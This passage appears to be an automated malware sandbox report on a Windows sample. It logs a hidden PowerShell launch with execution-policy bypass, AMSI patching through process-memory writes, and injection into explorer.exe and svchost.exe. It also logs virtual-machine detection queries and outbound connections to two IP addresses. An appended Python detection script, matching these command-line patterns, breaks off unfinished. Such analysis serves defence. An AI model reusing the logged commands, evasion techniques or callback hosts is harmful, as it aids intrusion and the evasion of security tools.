              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Windows\System32\svchost.exe WMI Queries: MSSmBios_RawSMBiosTables
              Source: C:\Windows\System32\svchost.exe WMI Queries: WDMClassesOfDriver.ClassName="MSSmBios_RawSMBiosTables",Driver="C:\\Windows\\system32\\kernelbase.dll[MofResourceName]",HighDateTime=30982926,LowDateTime=1699781275
              Source: C:\Windows\System32\svchost.exe WMI Queries: WDMClassesOfDriver.ClassName="MSSmBios_RawSMBiosTables",Driver="C:\\Windows\\system32\\kernelbase.dll[MofResourceName]",HighDateTime=30982968,LowDateTime=1311154843
              Source: C:\Windows\System32\svchost.exe WMI Queries: WDMClassesOfDriver.ClassName="MSSmBios_RawSMBiosTables",Driver="C:\\Windows\\system32\\en-US\\kernelbase.dll.mui[MofResourceName]",HighDateTime=30982926,LowDateTime=2562148143
              Source: C:\Windows\System32\svchost.exe WMI Queries: MSAcpi_ThermalZoneTemperature
              Source: C:\Windows\System32\svchost.exe WMI Queries: WDMClassesOfDriver.ClassName="MSAcpi_ThermalZoneTemperature",Driver="C:\\Windows\\system32\\kernelbase.dll[MofResourceName]",HighDateTime=30982926,LowDateTime=1699781275
              Source: C:\Windows\System32\svchost.exe WMI Queries: WDMClassesOfDriver.ClassName="MSAcpi_ThermalZoneTemperature",Driver="C:\\Windows\\system32\\kernelbase.dll[MofResourceName]",HighDateTime=30982968,LowDateTime=1311154843
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exe Memory allocated: 1320000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exe Memory allocated: 2D20000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exe Memory allocated: 2B20000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exe Memory allocated: 51F0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exe Memory allocated: 61F0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exe Memory allocated: 6320000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exe Memory allocated: 7320000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exe Memory allocated: 7CA0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exe Memory allocated: 8CA0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\explorer.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5069
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4759
              Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2417
              Source: C:\Windows\explorer.exe Window / User API: threadDelayed 6952
              Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 884
              Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 844
              Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 2696
              Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 1181
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.dll
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exe TID: 7720 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3536 Thread sleep count: 5069 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6148 Thread sleep count: 4759 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656 Thread sleep time: -12912720851596678s >= -30000s
              Source: C:\Windows\explorer.exe TID: 7508 Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 1936 Thread sleep count: 2696 > 30
              Source: C:\Windows\System32\wbem\WMIADAP.exe TID: 1936 Thread sleep count: 1181 > 30
              Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
              Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
              Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: svchost.exe, 00000006.00000000.1390670833.0000023359D71000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Win32_PnPEntityMicrosoft Hyper-V Virtualization Infrastructure Driver{4d36e97d-e325-11ce-bfc1-08002be10318}Win32_PnPEntityMicrosoft Hyper-V Virtualization Infrastructure DriverROOT\VID\0000System.String[]MicrosoftMicrosoft Hyper-V Virtualization Infrastructure DriverSystemROOT\VID\0000VidOKWin32_ComputerSystemuser-PCBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74
              Source: svchost.exe, 00000006.00000000.1389598483.00000233593A7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1572016071.00000233593AA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Win32_CacheMemoryCache Memory 2nd unrestricted access to all features of Hyper-V.OK
              Source: svchost.exe, 00000006.00000003.1572954734.0000023359376000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
              Source: svchost.exe, 00000006.00000000.1390078269.0000023359743000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 6LU2AGRR VMCI Bus Device
              Source: svchost.exe, 00000006.00000003.1572954734.0000023359376000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: stringComputer System ProductComputer System ProductZXGBMD2ED92742-89DC-DD72-92E8-869FA5A66493VMware, Inc.None
              Source: svchost.exe, 00000006.00000000.1389598483.00000233593A7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1572016071.00000233593AA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1576483229.00000233593AF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: user-PC\Hyper-V Administrators
              Source: svchost.exe, 00000006.00000000.1390138450.000002335978B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Generation Counter
              Source: svchost.exe, 00000006.00000000.1390078269.0000023359743000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 229FKOX3 VMCI Bus Device
              Source: svchost.exe, 00000006.00000000.1390138450.000002335978B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Win32_PnPEntityMicrosoft Hyper-V Generation Counter{4d36e97d-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntityMicrosoft Hyper-V Generation CounterACPI\VMW0001\7System.String[]MicrosoftMicrosoft Hyper-V Generation CounterSystemACPI\VMW0001\7gencounterOKWin32_ComputerSystemuser-PCBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74
              Source: svchost.exe, 00000006.00000000.1390670833.0000023359D71000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: svchost.exe, 00000006.00000000.1390078269.0000023359743000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: AC9SPRRK VMCI Bus Device
              Source: svchost.exe, 00000006.00000000.1390078269.0000023359743000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Win32_PnPEntity6LU2AGRR VMCI Bus Device{4d36e97d-e325-11ce-bfc1-08002be10318}System.String[]Win32_PnPEntity229FKOX3 VMCI Bus DevicePCI\LS1LLG1N&DEV_0740&SUBSYS_074015AD&REV_10\3&61AAA01&0&3FSystem.String[]VMware, Inc.AC9SPRRK VMCI Bus DeviceSystemPCI\THLU3ZGM&DEV_0740&SUBSYS_074015AD&REV_10\3&61AAA01&0&3FvmciOKWin32_ComputerSystemuser-PCBCAAEBA95E435CA5300A680BE9BF735F04A93ECECD18F46C56865C6158D43B74
              Source: svchost.exe, 00000006.00000000.1389598483.00000233593A7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1572016071.00000233593AA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1576483229.00000233593AF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Members of this group have complete and unrestricted access to all features of Hyper-V.
              Source: svchost.exe, 00000006.00000000.1389598483.00000233593A7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1572016071.00000233593AA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: nd unrestricted access to all features of Hyper-V.
              Source: svchost.exe, 00000006.00000000.1389598483.00000233593A7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1572016071.00000233593AA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1576483229.00000233593AF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Win32_GroupS-1-5-32-578user-PCuser-PC\Hyper-V AdministratorsHyper-V AdministratorsMembers of this group have complete and unrestricted access to all features of Hyper-V.OK
              Source: svchost.exe, 00000006.00000000.1389598483.00000233593A7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1572016071.00000233593AA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1576483229.00000233593AF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Administrators
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\explorer.exe Network Connect: 15.204.213.5 443
              Source: C:\Windows\explorer.exe Network Connect: 85.192.49.163 4782
              Source: 2.2.powershell.exe.2320691d278.1.raw.unpack, AmsiPatcher.cs Reference to suspicious API methods: OpenProcess(56u, bInheritHandle: false, pid)
              Source: 2.2.powershell.exe.2320691d278.1.raw.unpack, AmsiPatcher.cs Reference to suspicious API methods: LoadLibraryA("amsi.dll")
              Source: 2.2.powershell.exe.2320691d278.1.raw.unpack, AmsiPatcher.cs Reference to suspicious API methods: GetProcAddress(intPtr2, "AmsiOpenSession")
              Source: 2.2.powershell.exe.2320691d278.1.raw.unpack, AmsiPatcher.cs Reference to suspicious API methods: ReadProcessMemory(intPtr, procAddress, array, array.Length, IntPtr.Zero)
              Source: 2.2.powershell.exe.2320691d278.1.raw.unpack, AmsiPatcher.cs Reference to suspicious API methods: WriteProcessMemory(intPtr, new IntPtr(value), patch, patch.Length, IntPtr.Zero)
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: 104F0000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3084 base: 104F0000 value: E8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\svchost.exe base: 7FF839063843
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 104F0000
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NonInteractive -File "C:\Users\user\AppData\Local\Temp\ace9e5a3-2f4b-4e08-b92c-ed7f0e4c1ad2.ps1"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akylvhfm\akylvhfm.cmdline"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD89C.tmp" "c:\Users\user\AppData\Local\Temp\akylvhfm\CSC15D32CA6BA724B45B0CB2F57F81BE153.TMP"Jump to behavior
              Source: C:\Users\user\Desktop\PI1qW7yV9K.exeQueries volume information: C:\Users\user\Desktop\PI1qW7yV9K.exe VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
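The chain above (sample spawns powershell.exe with -ExecutionPolicy Bypass and a hidden window running a .ps1 from Temp, powershell.exe drives csc.exe to compile from Temp, and the injected explorer.exe opens outbound connections on 443 and 4782) is what the report's Sigma-style signatures key on. The following Python is an added example, not code from the Joe Sandbox report or from the sample: it re-implements those checks over constructed Sysmon-style events built from the command lines and connections listed in this section. The rule names, the benign control events, the 203.0.113.10 address and the field mapping are assumptions.

```python
"""Detection logic for the process chain in this report (added example).

Rules implemented: PowerShell execution-policy bypass, hidden window, script run
from a Temp-like folder, csc.exe compiling from a suspicious location, and a
Windows shell process (explorer.exe) acting as a network client, optionally on a
non-standard port. Event shapes follow Sysmon events 1 (process) and 3 (network).
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str      # full path of the created process
    cmdline: str    # its command line as logged
    parent: str     # full path of the parent process


@dataclass
class NetEvent:
    image: str      # process that initiated the connection
    dst_ip: str
    dst_port: int


# Locations from which scripts and compiler jobs should not normally run.
SUSPICIOUS_DIRS = re.compile(
    r"\\(?:AppData\\Local\\Temp|Windows\\Temp|Users\\Public|ProgramData)\\", re.I)
# powershell.exe accepts any unambiguous parameter prefix (-ep, -ex, -exec, -ExecutionPolicy,
# -w, -win, -WindowStyle, -f, -File), so the patterns match the prefix, not the full name.
EP_BYPASS = re.compile(r"-e(?:p|x\w*)\s+bypass", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:i\w*)?\s+hidden", re.I)
SCRIPT_ARG = re.compile(r'(?:^|\s)-f(?:i\w*)?\s+"?([^"\s]+\.ps1)', re.I)
RESPONSE_FILE = re.compile(r'@"?([^"\s]+\.cmdline)', re.I)   # csc.exe @<response file>
STANDARD_PORTS = {53, 80, 443}
SHELL_PROCESSES = {"explorer.exe"}   # the injection target in this report; not a network client


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate_process(ev: ProcEvent) -> list[str]:
    """Return the rule names a process-creation event triggers, in rule order."""
    findings = []
    img = basename(ev.image)
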